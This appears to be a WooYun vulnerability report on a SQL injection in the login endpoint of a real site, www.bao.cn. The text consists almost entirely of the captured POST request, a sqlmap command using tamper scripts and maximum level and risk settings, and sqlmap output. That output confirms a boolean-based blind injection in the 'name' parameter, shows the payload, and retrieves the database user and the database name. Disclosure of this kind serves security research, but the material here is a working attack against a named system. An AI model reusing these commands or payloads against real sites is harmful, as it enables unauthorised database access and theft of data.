WooYun.org

POST /ucenter/login/checkUser HTTP/1.1
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.bao.cn:443/
Cookie: PHPSESSID=coeiqujoclndb0fjf54l8ilkn2; NoviceGuide=my+value
Host: www.bao.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
name=e&ps=e

sqlmap.py -r bao.txt --dbs --current-db --current-user --is-dba --tamper=space2comment,between --level 5 --risk 3 -p name

POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 729 HTTP(s) requests:
---
Parameter: name (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: name=-8761")) OR 9759=9759#&ps=e
---
[10:59:59] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[10:59:59] [INFO] testing MySQL
[11:00:04] [INFO] confirming MySQL
[11:00:19] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[11:00:19] [INFO] fetching current user
[11:00:19] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:00:19] [INFO] retrieved: zhang@%
current user:    'zhang@%'
[11:02:53] [INFO] fetching current database
[11:02:53] [INFO] retrieved: newbao